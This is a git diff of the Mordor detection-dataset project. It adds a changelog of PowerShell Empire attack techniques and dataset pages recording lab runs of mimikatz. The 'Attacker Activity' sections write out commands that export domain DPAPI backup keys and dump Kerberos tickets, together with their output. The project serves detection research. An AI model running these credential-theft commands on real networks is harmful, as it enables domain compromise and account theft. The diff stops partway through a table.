diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100644 index 00000000..2fede57f --- /dev/null +++ b/CHANGELOG.md 
@@ -0,0 +1,110 @@ +# Changelog + +## Verion 0.0.2 +---------------------------------- + +[Full Changelog](https://github.com/Cyb3rWard0g/mordor/compare/0.0.1...0.0.2) + +### Fixed: +**defense evesion** + +* Process Injection + * Empire PsInject + +### Added: +**Credential Access** + +* Credential Dumping + * Empire Mimikatz Export Master Key + * Empire Mimikatz Extract Tickets + * Empire Mimikatz Lsadump + * Empire Powerdump + +**Defense Evasion** + +* Modify Registry + * Empire Enable RDP + * Empire Wdigest Downgrade + +* Process Injection + * Empire Dll Injection + +* Trusted Developer Utilities + * Empire Invoke Msbuild + +**Discovery** + +* Account Discovery + * Empire Fin-LocalAdminAccess + * Empire Net User Domain SPecific + +* System Network Connections Discovery + * Empire Get Session Local + * Empire Get Session DC + +* System Service Discovery + * Empire Net Start + * Empire Powerup All Checks + +**Execution** + +* PowerShell + * Empire Invoke Psremoting +* Service Execution + * Empire Invoke Psexec +* Windows Management Instrumentation + * Empire Invoke wmi debugger + * Empire wmic add user backdoor + +**Lateral Movement** + +* Distributed Component Object Model + * Empire Invoke DCOM +* Trusted Developer Utilities + * Empire Invoke Msbuild +* Windows Admin Shares + * Empire Infoke Smbexec +* PowerShell + * Empire Invoke Psremoting +* Service Execution + * Empire Invoke Psexec +* Windows Management Instrumentation + * Empire Invoke wmi debugger + * Empire wmic add user backdoor + +**Persistence** + +* Registry Run + * Empire Elevated Registry +* Scheduled Tasks + * Empire Elevated Schtasks +* WMI Event Subscription + * Empire Elevated WMI + +**Privilege Escalation** + +* Access Token Manipulation + * Empire Invoke Runas +* Bypass UAC + * Empire Ask + +### Updated: +**Execution** + +* Windows Management Instrumentation + * Empire Invoke-Wmi + +**Credential Access** + +* Credential Dumping + * Empire Mimikatz logonpasswords + +**Discovery** + +* 
Permissions Group Discovery + * Empire Net Domain Admins + +**Execution** + +* Scripting + * Empire Launcher Vbs \ No newline at end of file diff --git a/README.md b/README.md index eeaf9d59..f18ce6b5 100644 --- a/README.md +++ b/README.md 
@@ -20,47 +20,6 @@ The name **Mordor** comes from the awesome book/film series "[The Lord of the Ri * Ingest known bad data samples for training and capture the flag (CTF) events. * Learn more about red team simulation exercises and technology such as Kafkacat, Kafka and Jupyter Notebooks. -# Why Mordor? - -Think about an attack that you want to test in your lab environment. -Let's say we want to emulate an adversary using a non-domain-controller-account abusing the use of Active Directory replication services to optain the NTLM hash of user. -What do we do if we want to automate and expedite the emulation process? Usually the following might happen: - -* Google for "DCSync" to look for the right script or red team simulation toolkit/project to execute the attack. -* Find that it can be done via several programming languages and several tools out there. -* Pick a "variant". In this case let's say we pick the Invoke-Mimikatz script from Powershell Empire. -* Test the adversarial technique. -* Document relevant data sources. At the endpoint level, the main behavior produces specific Windows Security events (Event ID 4662). -* Consider other variants and try another way to accomplish the main adversarial objective. -* Test another basic variant via another atomic red teaming toolkit. At the endpoint level, the main behavior produces the same Windows Security events (Events ID 4662). -* Learn and test new ways to execute the adversarial technique (i.e .NET) and run it again. -* At the endpoint level, the main behavior produces again the same Windows Security events (Events ID 4662). - -In my basic DCSync test I was using a user with replication permissions to initiate an ad replication operation. -The user name was ``Mmidge``. -I was getting one of the following events: - - - -## What is going on here? 
- -Most of the time, depending on the detection goal, it does not matter what tool or programming language I use to emulate the adversarial technique or how many times I execute the attack, I still get the same event logic, pattern or relevant data. - -From my basic example, I ask myself these question: - -* What is my main goal? -* Do I want to primarily detect .NET behavior or the behavior of a non-domain-controller account abusing ad replication services?. - -Do not get me wrong, the extra context of the execution method or the technique enabler is also valuable. -However, I believe that we can expedite the emulation of an adversarial technique by giving you the relevant data and pattern directly and go straight to the analysis phase of your threat detection strategy. - -## Do I ONLY get the events related to the adversarial techniques? - -* You get the potential relevant events and the extra context produced by other security events that get created during the time window of the log collection. -* This is valuable if you want to explore other ways to enrich your data analytic and use extra context from events from different data sources. -* For example, you also get events of the command and control communication from the endpoint which can then be mapped to the specific adversarial technique you are analyzing. -* In addition, depending on the type of dataset you use, you get more context. Learn more about them in our [documentation here](https://mordor.readthedocs.io/en/latest/mordor_categorization.html) - # Getting Started * Mordor Environments @@ -100,7 +59,7 @@ There are a few things that we would like to accomplish with this repo as shown - [ ] Share Terraform & Packer config files to deploy the same environment in the cloud - [ ] Add a Bro sensor - [ ] Multiple custom network setup for contributions -- [ ] Prepare Large Dataset ;) -- [ ] Logo +- [X] Prepare Large Dataset ;) +- [X] Logo More coming soon... \ No newline at end of file 
diff --git a/docs/source/_static/empire_ask.png b/docs/source/_static/empire_ask.png new file mode 100644 index 00000000..4d10a00f Binary files /dev/null and b/docs/source/_static/empire_ask.png differ diff --git a/docs/source/_static/empire_launcher_vbs.png b/docs/source/_static/empire_launcher_vbs.png index 7bf221eb..ed0caa44 100644 Binary files a/docs/source/_static/empire_launcher_vbs.png and b/docs/source/_static/empire_launcher_vbs.png differ diff --git a/docs/source/network_shire.rst b/docs/source/network_shire.rst index 52277c55..0543bad6 100644 --- a/docs/source/network_shire.rst +++ b/docs/source/network_shire.rst 
@@ -15,23 +15,23 @@ Network Design :alt: The Shire Design :scale: 35% -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Platform | Version | Purpose | Name | IP Address | Main User | -+===========+=============+===============+===========+===============+===============+ -| Windows | Win 2016 | DC | HFDC1 | 172.18.39.5 | Administrator | -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Windows | Win 10 | Client | HR001 | 172.18.39.106 | nmartha | -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Windows | Win 10 | Client | IT001 | 172.18.39.105 | pgustavo | -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Windows | Win 10 | Client | ACCT001 | 172.18.39.100 | lrodriguez | -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Windows | Win 2016 | Win Collector | WECServer | 172.18.39.102 | wecserver | -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Linux | HELK 0.1.7 | Log Collector | helk | 10.0.10.102 | helk | -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Linux | Kali 2018.4 | Red Team C2 | kali | 10.0.10.106 | wardog | -+-----------+-------------+---------------+-----------+---------------+---------------+ ++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Platform | Version | Purpose | FQDN | IP Address | Main User | ++===========+=============+===============+=====================+===============+===============+ +| Windows | Win 2016 | DC | HFDC1.shire.com | 172.18.39.5 | Administrator | ++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Windows | Win 10 | Client | HR001.shire.com | 172.18.39.106 | nmartha | 
++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Windows | Win 10 | Client | IT001.shire.com | 172.18.39.105 | pgustavo | ++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Windows | Win 10 | Client | ACCT001.shire.com | 172.18.39.100 | lrodriguez | ++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Windows | Win 2016 | Log Collector | WECServer.shire.com | 172.18.39.102 | wecserver | ++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Linux | HELK 0.1.7 | Data Analysis | helk | 10.0.10.102 | helk | ++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Linux | Kali 2018.4 | Red Team C2 | kali | 10.0.10.106 | wardog | ++-----------+-------------+---------------+---------------------+---------------+---------------+ Data Sources Collected ###################### diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/README.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/README.md index 9abee6d9..270b6129 100644 --- a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/README.md +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/README.md @@ -4,6 +4,6 @@ An adversary with enough permissions can abuse active directory services to acce ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_dcsync](./empire_dcsync.md) | 2019-03-01174830 | \ No newline at end of file +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_dcsync](./empire_dcsync.md) | 2019-03-01174830 | \ No newline at end of file 
diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/empire_dcsync.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/empire_dcsync.md index cfeff480..48caef48 100644 --- a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/empire_dcsync.md +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/empire_dcsync.md @@ -1,4 +1,3 @@ - # Empire DCSync An adversary with replication permissions (default in Domain Admins) can use the active directory replication apis to pull the NTLM hash of any user in the network. @@ -78,7 +77,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 2325 | | Microsoft-Windows-Bits-Client/Operational | Microsoft-Windows-Bits-Client | na | 6 | -## Empire Activity +## Attacker Activity ``` usemodule credentials/mimikatz/dcsync diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/README.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/README.md index 85616193..b05be781 100644 --- a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/README.md +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/README.md 
@@ -4,6 +4,8 @@ An adversary can grab credentials from the memory contents of processes such as ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_mimikatz_logonpasswords](./empire_mimikatz_logonpasswords.md) | 019-03-19130532 | +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_mimikatz_logonpasswords](./empire_mimikatz_logonpasswords.md) | 2019-05-18202151 | +| shire | [empire_mimikatz_extract_tickets](./empire_mimikatz_extract_tickets.md) | 2019-05-18230752 | +| shire | [empire_mimikatz_export_master_keys](./empire_mimikatz_export_master_key.md) | 2019-05-18235535 | diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_export_master_key.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_export_master_key.md new file mode 100644 index 00000000..7d030df5 --- /dev/null +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_export_master_key.md 
@@ -0,0 +1,106 @@ +# Empire Mimikatz Export Master Key + +Data Protection Application Programming Interface (DPAPI) is used by Windows to securely protect passwords saved by browsers, encrypted files, and other sensitive data. Domain controllers hold a master key that can decrypt all secrets on domain-joined Windows machines. Mimikatz can be used to export the master key from the domain controller remotely. + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_mimikatz_export_master_key.tar.gz](./empire_mimikatz_export_master_key.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18235535 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 2228 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| System | Microsoft-Windows-GroupPolicy | na | 1 | +| System | Service Control Manager | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 217 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 132 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 132 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 36 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 15 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 15 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 14 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 12 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 11 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 9 | +| Security | 
Microsoft-Windows-Security-Auditing | Other Object Access Events | 7 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 7 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 3 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Plug and Play Events | 2 | +| Security | Microsoft-Windows-Security-Auditing | SAM | 2 | +| Security | Microsoft-Windows-Security-Auditing | DPAPI Activity | 1 | +| Security | Microsoft-Windows-Security-Auditing | Security Group Management | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 405 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 258 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 254 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 211 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 87 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 77 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 39 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 9 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected 
(rule: RawAccessRead) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 1995 | + +## Attacker Activity + +``` +(Empire: powershell/credentials/mimikatz/command) > set Command lsadump::backupkeys /system:HFDC01.shire.com /export +(Empire: powershell/credentials/mimikatz/command) > execute +[*] Tasked 13GK9C5T to run TASK_CMD_JOB +[*] Agent 13GK9C5T tasked with task ID 1 +[*] Tasked agent 13GK9C5T to run module powershell/credentials/mimikatz/command +(Empire: powershell/credentials/mimikatz/command) > Job started: DPB5F4 +Hostname: HR001.shire.com / S-1-5-21-2511471446-1103646877-3980648787 + + .#####. mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02 + .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** + ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) + ## \ / ## > http://blog.gentilkiwi.com/mimikatz + '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) + '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ + +mimikatz(powershell) # lsadump::backupkeys /system:HFDC01.shire.com /export + +Current prefered key: {a1b58ded-16ec-4822-ab1c-3a4cfb9c268a} + * RSA key + Exportable key : YES + Key size : 2048 + Private export : OK - 'ntds_capi_0_a1b58ded-16ec-4822-ab1c-3a4cfb9c268a.pvk' + PFX container : OK - 'ntds_capi_0_a1b58ded-16ec-4822-ab1c-3a4cfb9c268a.pfx' + Export : OK - 'ntds_capi_0_a1b58ded-16ec-4822-ab1c-3a4cfb9c268a.der' + +Compatibility prefered key: {116228fd-901d-4386-853a-9611c3c93e28} + * Legacy key +aff6c7adc1e0ddc685fae1fd657a1f6756df313f9b149f4af78949700de1022f +e921157be464fc5cd40ceec73694e565bcab123780f285a5cd678af40cf5f0bb +ec9e6b981966d12e5a7de25073fbb716a0e435d1dfee8c55bf5725172161f9d3 +06f4e00ffa1bc37de63719a7e5173ce20b69dc2764664535435aab7afbc1d332 +f0c7837839ab891efcb6dc9490746d35aab45efc5e72a7270186ae0260d1ad0f 
+28e5cbe391c9df45dd38e7e5681df55a216a2d50e4de0d8cdd33dde8806569ee +fe3e906081c4d1c18e4f42461133a2646fce2a37773ea15bbaae5fef01c0997e +f19dcfaf5582ab001056b8fe921c5f5c896f145fef1dfeda8ebe9ef4fd4fccdb + + Export : OK - 'ntds_legacy_0_116228fd-901d-4386-853a-9611c3c93e28.key' + +(Empire: powershell/credentials/mimikatz/command) > +``` \ No newline at end of file diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_export_master_key.tar.gz b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_export_master_key.tar.gz new file mode 100644 index 00000000..41578267 Binary files /dev/null and b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_export_master_key.tar.gz differ diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_extract_tickets.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_extract_tickets.md new file mode 100644 index 00000000..6fc296dd --- /dev/null +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_extract_tickets.md 
@@ -0,0 +1,159 @@ +# Empire Mimikatz Extract Tickets + +PowerSploit's Invoke-Mimikatz function to extract kerberos tickets from memory in base64-encoded form. + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_mimikatz_extract_tickets.tar.gz](./empire_mimikatz_extract_tickets.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18230752 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 1854 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 303 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 268 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 60 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 16 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 16 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 16 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 16 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 15 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 15 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 14 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 5 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 2 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket 
Operations | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 42 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 521 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 274 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 190 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 77 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 51 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 26 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 2294 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule credentials/mimikatz/extract_tickets +(Empire: powershell/credentials/mimikatz/extract_tickets) > info + + Name: Invoke-Mimikatz extract kerberos tickets. 
+ Module: powershell/credentials/mimikatz/extract_tickets + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @JosephBialek + @gentilkiwi + +Description: + Runs PowerSploit's Invoke-Mimikatz function to extract + kerberos tickets from memory in base64-encoded form. + +Comments: + http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Agent True TKV35P8X Agent to run module on. + +(Empire: powershell/credentials/mimikatz/extract_tickets) > execute +[*] Tasked TKV35P8X to run TASK_CMD_JOB +[*] Agent TKV35P8X tasked with task ID 39 +[*] Tasked agent TKV35P8X to run module powershell/credentials/mimikatz/extract_tickets +(Empire: powershell/credentials/mimikatz/extract_tickets) > Job started: YG28AV +Hostname: HR001.shire.com / S-1-5-21-2511471446-1103646877-3980648787 + + .#####. mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02 + .## ^ ##. 
"A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** + ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) + ## \ / ## > http://blog.gentilkiwi.com/mimikatz + '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) + '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ + +mimikatz(powershell) # standard::base64 +isBase64InterceptInput is false +isBase64InterceptOutput is false + +mimikatz(powershell) # kerberos::list /export + +[00000000] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 7:03:14 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : krbtgt/SHIRE.COM @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ; + * Saved to file : 0-60a10000-nmartha@krbtgt~SHIRE.COM-SHIRE.COM.kirbi + +[00000001] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 6:23:33 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : krbtgt/SHIRE.COM @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; + * Saved to file : 1-40e10000-nmartha@krbtgt~SHIRE.COM-SHIRE.COM.kirbi + +[00000002] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 7:03:14 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : cifs/HFDC01.shire.com @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; + * Saved to file : 2-40a50000-nmartha@cifs~HFDC01.shire.com-SHIRE.COM.kirbi + +[00000003] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 6:54:14 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : ldap/HFDC01.shire.com/shire.com @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; + * Saved to file : 
3-40a50000-nmartha@ldap~HFDC01.shire.com~shire.com-SHIRE.COM.kirbi + +[00000004] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 6:32:04 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : HOST/HFDC01 @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; + * Saved to file : 4-40a50000-nmartha@HOST~HFDC01-SHIRE.COM.kirbi + +[00000005] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 6:23:48 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : cifs/IT001 @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; + * Saved to file : 5-40a10000-nmartha@cifs~IT001-SHIRE.COM.kirbi + +[00000006] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 6:23:33 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : ldap/HFDC01.shire.com @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; + * Saved to file : 6-40a50000-nmartha@ldap~HFDC01.shire.com-SHIRE.COM.kirbi + +(Empire: powershell/credentials/mimikatz/extract_tickets) > +``` \ No newline at end of file diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_extract_tickets.tar.gz b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_extract_tickets.tar.gz new file mode 100644 index 00000000..65e9b377 Binary files /dev/null and b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_extract_tickets.tar.gz differ 
diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.md index 90071aeb..d35d7195 100644 --- a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.md +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.md 
@@ -16,57 +16,83 @@ Shire ## Time Taken -019-03-19130532 +2019-05-18202151 ## About this file | log_name | source_name | task | record_number | |--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| -| Windows PowerShell | PowerShell | Pipeline Execution Details | 2343 | +| Windows PowerShell | PowerShell | Pipeline Execution Details | 1558 | | Windows PowerShell | PowerShell | Provider Lifecycle | 8 | | Windows PowerShell | PowerShell | Engine Lifecycle | 1 | -| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 335 | -| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 275 | -| Security | Microsoft-Windows-Security-Auditing | User Account Management | 148 | -| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 10 | -| Security | Microsoft-Windows-Security-Auditing | Process Termination | 9 | -| Security | Microsoft-Windows-Security-Auditing | Process Creation | 8 | +| System | Service Control Manager | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 154 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 112 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 28 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 14 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 9 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 8 | | Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 8 | -| Security | Microsoft-Windows-Security-Auditing | Group Membership | 7 | -| Security | Microsoft-Windows-Security-Auditing 
| Logoff | 7 | -| Security | Microsoft-Windows-Security-Auditing | Logon | 7 | -| Security | Microsoft-Windows-Security-Auditing | Special Logon | 7 | | Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 6 | -| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 5 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 4 | +| Security | Microsoft-Windows-Security-Auditing | Kernel Object | 3 | +| Security | Microsoft-Windows-Security-Auditing | Directory Service Access | 1 | | Security | Microsoft-Windows-Security-Auditing | File Share | 1 | -| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1520 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 1480 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 994 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 286 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 180 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 70 | -| 